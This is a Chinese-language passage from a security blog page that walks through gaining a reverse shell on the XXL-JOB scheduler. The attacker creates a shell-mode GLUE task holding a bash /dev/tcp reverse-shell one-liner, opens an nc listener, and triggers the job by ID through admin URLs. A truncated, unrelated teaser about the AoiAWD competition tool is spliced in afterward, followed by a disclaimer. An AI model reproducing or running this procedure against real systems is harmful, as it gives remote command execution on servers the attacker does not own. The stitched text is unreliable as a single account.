利用过程
点击任务管理、新增一个执行任务,配置如下(运行模式选择shell,cron是linux定时任务,如下0时0分0秒执行一次):
进入GLUE面板,写入执行的脚本命令。随意命名备注名称,保存并关闭
0<&196;exec 196<>/dev/tcp/10.0.01/4242; sh <&196 >&196 2>&196
服务器监听shell,受害机执行任务
nc -lvvp 4242
返回shell到服务器
参考: https://www.cnblogs.com/kbhome/p/13210394.html
遇到的问题
在添加任务后,提示添加成功,但不显示添加的任务,所以不能进入GLUE面板写脚本命令。
解决
添加一个无执行器的任务,记住ID,比如2,xxl-job的任务ID是顺序添加的,所以下次添加的一定是3,然后添加有执行器的任务,按照上面的正常添加就行(注: 最好是去看看哪个任务带有执行器,有些是不会全有执行器的,确认好有执行器的任务后,添加相应的任务即可。)
虽然提示添加成功,但是不会显示任务,所以我们直接编辑对应ID的任务就行
编辑:
http://target/jobcode?jobId=3
这里的id=3为上述所说的,具体看你添加之前的ID是多少
执行:
http://target/jobinfo/trigger?id=3&executorParam=最近打了几次AWD比赛,发现手中的工具依然不好用,在github上发现了AoiAWD,AoiAWD 是一个由Aodzip(安恒信息 海特实验室研究员、HAC战队成员)维护的一个针对于CTF AWD模式的开源项目。专为比赛设计,便携性好,低权限运行的EDR系统。…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论